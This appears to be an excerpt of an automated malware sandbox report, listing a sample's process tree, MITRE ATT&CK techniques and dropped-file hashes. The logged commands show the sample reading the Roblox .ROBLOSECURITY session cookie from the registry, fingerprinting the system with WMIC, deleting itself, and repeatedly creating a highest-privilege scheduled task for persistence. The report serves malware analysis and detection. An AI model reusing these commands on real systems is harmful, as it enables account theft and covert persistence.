C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:792
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2080
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵PID:2932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2272
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name5⤵
- Detects videocard installed
PID:1956
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe" && pause5⤵PID:1556
-
C:\Windows\system32\PING.EXEping localhost6⤵
- Runs ping.exe
PID:960
-
-
-
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:548
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1924
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:1568
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1148
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:964
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:944
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:2008
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:968
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:1680
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2804
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:2720
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1476
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:1452
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:652
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:2232
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:900
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:1444
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1952
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:2796
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2476
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:1536
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1640
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:2608
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2604
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:2860
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
380KB
MD57091d715676e10c44205e6fa7f50b7bd
SHA1a950398047b6b554181538d6e78ada18bfba510e
SHA25623f43cc11c07245b3c5c14333a53b97330ebd7afa4a893245834fbebfa967d88
SHA5122fd66a8fd5b4d0f1ef52f6cd89b8e14936b56fdb967a83382d8081e67fbbabdb609decef98d19c8caebcc1b5b9bcc3cbaa0209112c9c081556ff87bfcdf7308b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD532c10adfa070cac5233ba09dfd7d6568
SHA1549315ddea6a09bbdf25c552d4a20183483564a1
SHA256cb59c3b2085b9e3950cb64e35a1d8defd4bcc3ec5bfce3c216f7cc80f87d62bf
SHA51261623834c50f3ce0daa1d9a9db15930ddb473a09ac69f5ab9f5a0a17dac4b2f45d727c7be5a9dadd6af7b66489f9c3f57b070fd8f35aa11dddc256c4290ebf20
-
Filesize
227KB
MD553681862212e052e3c6b3e9ca9594428
SHA1f89c700368b19d182062f673f9b51199e08c47cc
SHA2562576a8b91992cead33bc30b306852a6fbaa559fff89a534537495abe76aca3a2
SHA5122f9649751aeeabd4e59b7e172937518bb6867ce99eee00687243d6218edbdbc5d573a5cea36416131a3787360d215d557f91c75f480d30ce3d6bbd1152e81fa8